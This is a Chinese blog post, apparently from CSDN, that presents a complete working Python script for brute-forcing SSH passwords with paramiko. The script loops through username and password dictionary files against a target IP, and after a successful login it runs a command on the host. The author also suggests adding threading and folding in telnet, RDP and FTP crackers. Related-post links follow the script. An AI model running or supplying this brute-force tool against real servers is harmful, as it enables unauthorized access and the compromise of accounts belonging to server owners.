#我的武器库#之SSH爆破核心实现

最新推荐文章于 2024-05-31 15:24:25 发布
最新推荐文章于 2024-05-31 15:24:25 发布
阅读量335 收藏
点赞数
分类专栏: python 渗透攻击 文章标签: python爆破 ssh爆破
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/a59a59/article/details/94607274
版权

        Linux服务器多数开放SSH登陆,渗透人员可以通过Metasploit、hydra等工具进行爆破,其实通过python实现ssh爆破非常简单,核心思想为:1.通过paramiko组件创建client;2.采用用户名及密码的传统认证方式;3.从字典表读取用户名及密码进行逐一连接认证。

   一、源代码


#-*- coding:utf8 -*-
import paramiko

def crackhandle(client, ip, user, passwd, command):
    try:
        client.connect(ip, username=user, password=passwd)  #连接
        client.get_transport().banner_timeout = 2;
        ssh_session = client.get_transport().open_session() #打开会话
        if ssh_session.active:
            ssh_session.exec_command(command)   #执行命令
            return  ssh_session.recv(1024);
    except Exception as e:
        print(e);
        print("username [%s] password [%s] fail" % (user,passwd));
        return "";

def crack(ip,command):
    passwordsList = open("/root/Desktop/pythonTest/password.txt");
    usernamesList = open("/root/Desktop/pythonTest/username.txt");
    passwords = passwordsList.readlines();
    usernames = usernamesList.readlines();
    client = paramiko.SSHClient();
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy());
    switch = False;
    for usuername in usernames:
        username = usuername.strip();
        for password in passwords:
            password = password.strip();
            commandRecv = crackhandle(client,ip,str(username),str(password),command);
            if len(commandRecv)>1:
                print("success userName is %s password is %s" % (username,password));
                switch = True;
                break;
        if switch:
            break;
crack("192.168.1.102","id");

#crackhandle("127.0.0.1","root","toor","id");

代码中我加了cmd的指令输出作为认证,其实没必要。

运行指令: python sshCrack.py

效果图如下,可以看到爆破成功。

二、下一步优化

在优化方面,可以分为三个层面。

      1.性能 :与线程结合,加快爆破速度,提升爆破效率。

      2.功能:形成爆破工具箱,可对ssh、telnet、3389、ftp等爆破代码进行整合,方便渗透人员便捷使用。业界已有非常出色的工具箱,通过自己动手编写代码了解原理和实现方式还是非常有必要的。

      3.字典表:爆破是否成功在与字典表,足够丰富又具有针对性的字典表非常重要。

登峰造Geek
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
python使用ssh服务传输数据
pochy的博客
03-31 612
# -*- coding:utf-8 -*- import paramiko,os,sys,time port = 22 user = 'root' def ssh_scp_put(ip,port,user,password,local_file,remote_file): ssh = paramiko.SSHClient() ssh.set_missing_host_key_p...
SSH爆破
Cool_001的博客
01-15 212
使用fail2ban来防止爆破 Debian安装(也可在宝塔面板中安装) apt install fail2ban 建议不要直接修改jail.conf配置文件( 因为软件升级时该文件可能被覆盖),而是拷贝为jail.local再修改jail.local 如果SSH端口不是默认,配置文件中也需更改SSH端口号 [DEFAULT] ignoreip = 127.0.0.1/8 #指定哪些地址可以忽略 fail2ban 防御 bantime = 86400 #客户端主机被禁
企业内网安全防范WannaCry及NSA武器库指南
05-15
今日(2017-05-15),360官方紧急发布了一个企业内网安全防范WannaCry及NSA武器库指南,赶紧对照指南进行内网安全防护吧!!
悬剑武器库内部日刊.zip
07-11
悬剑武器库团队内部日刊
悬剑武器库5.04版
最新发布
2301_76786857的博客
05-31 1322
悬剑5 基于“悬剑网盘”精选工具集+悬剑5“飞廉”云武器库制作。操作系统:Windows 10 专业版。下载镜像,文末获取下载链接。系统占用空间63.0 GB。镜像大小:33.1GB。使用虚拟机打开镜像文件。解压密码: 圈子社区。
7大单兵武器库下载 | 渗透测试集成系统环境
热门推荐
Ms08067安全实验室
07-15 2万+
本文作者:Harveysn0w(Ms08067实验室 核心成员)以下介绍的系统环境都可以说是一个单兵武器库。每一个渗透系统环境都各有不同,它们集成了各式各样的武器装备,只需导入虚拟机,既...
悬剑武器库之5种工具学习(shiro检测插件、子域名、信息收集、暴力破解等)
zhangge3663的博客
01-18 8639
工具目录 1.BurpShiroPassiveScan是一款基于BurpSuite的被动式shiro检测插件2.reconftw是对具有多个子域的目标执行全面检查的脚本3.CTFR是一款不适用字典攻击也不适用蛮力获取的子域名的工具4.JR-scan是一款一键实现基本信息收集,支持POC扫描,支持利用AWVS探测的工具5.dirsearch-Web是一种成熟的命令行工具,旨在暴力破解Web服务器中的目录和文件 1.BurpShiroPassiveScan 介绍 BurpShiroPassiveScan
记录一次ssh密码被爆破
06-14 568
概述 事情是这样的,一天登录家里服务器的时候无意间看到了下面 There was 242 failed login attempt since the last successful login. 这个时候我就意识到有人在爆破我的ssh密码了,我的服务器架构是下面这样的 开始我也没有在意,...
Python库 | ssh-client-baoer-0.0.4.tar.gz
03-10
ssh-client-baoer-0.0.4库的核心特性包括: 1. **连接管理**:该库允许用户建立、维护和关闭与远程服务器的SSH连接。这包括设置主机名、端口、用户名和密码或使用密钥进行身份验证。 2. **命令执行**:用户可以...
CTF PWN 武器库
12-12
"CTF PWN 武器库题"通常指的是这类竞赛中的一个问题,挑战者需要利用编程技巧来解决安全漏洞,获取系统的控制权。在这个特定的案例中,我们面对的题目是"rifle",它涉及到fastbin堆溢出,这是一种常见的内存管理漏洞...
悬剑3.0公益版百度网盘链接地址.txt
05-13
悬剑3.0是一款专门为网络安全审计人员设计的一款集成了大量安全审计工具的系统,是在2.0版本上,重构了核心框架,去除了部分无用或过于陈旧的软件外,新增了增加了更多的工具,目前收集整理和原创的工具已搞到3289款。
LeafyTheCabbage:LDJAM #32- 非常规武器
06-11
《Unity游戏开发:LeafyTheCabbage - 非常规武器》 在Ludum Dare #32 LDJAM活动中,一款名为“LeafyTheCabbage”的游戏以其独特的创意和有趣的玩法吸引了众多玩家的注意。这款游戏是用Unity引擎制作的,充分展示了...
悬剑武器库团队内部日刊
Sumarua的博客
07-12 4428
悬剑武器库团队内部日刊 文件目录如下: 资源已上传至☞:
自动化测试学习:使用python库Paramiko实现远程服务器上传和下载
deerxiaoluaa的博客
01-12 4556
前言 测试过程中经常会遇到需要将本地的文件上传到远程服务器上,或者需要将服务器上的文件拉到本地进行操作,以前安静经常会用到xftp工具。今天安静介绍一种python库Paramiko,可以帮助我们通过代码的方式进行完成对远程服务器的上传和下载操作,也可以进行对远程服务器输入操作命令。 ​Paramiko Paramiko属于python的一个第三方库,可以远程连接Linux服务器,进行通过python进行对Linux进行操作,可以实现进行对远程服务器进行下载和上传文件操作。 安装 既然是第
悬剑5.0
weixin_68057794的博客
02-12 2941
悬剑5.0
python ssh登录_python_ssh连接
weixin_39580748的博客
12-05 207
首先下载paramikopip install paramiko查看并启动ssh服务service ssh status添加用户:useradd -d /home/zet zetpasswd zet赋予ssh权限vi /etc/ssh/sshd_config添加AllowUsers:zet客户端代码#-*- coding:utf8 -*-import threadingimport paramik...
悬剑武器库打开ovf文件报错Failed to read from file:
2302_77302329的博客
05-16 243
找到悬剑武器库解压的目录;把vmdk文件重命名为悬剑武器库3.0公益版-disk1.vmdk。
红队武器库平台美杜莎安装
09-06
根据引用的信息,美杜莎是一个红队武器库平台,它已获得GPL许可,可以免费用于非商业用途。该项目的开发人员目前比较不足,如果您发现问题或有任何意见,可以与他们联系。根据引用[2]提供的信息,我没有找到关于...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

登峰造Geek

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值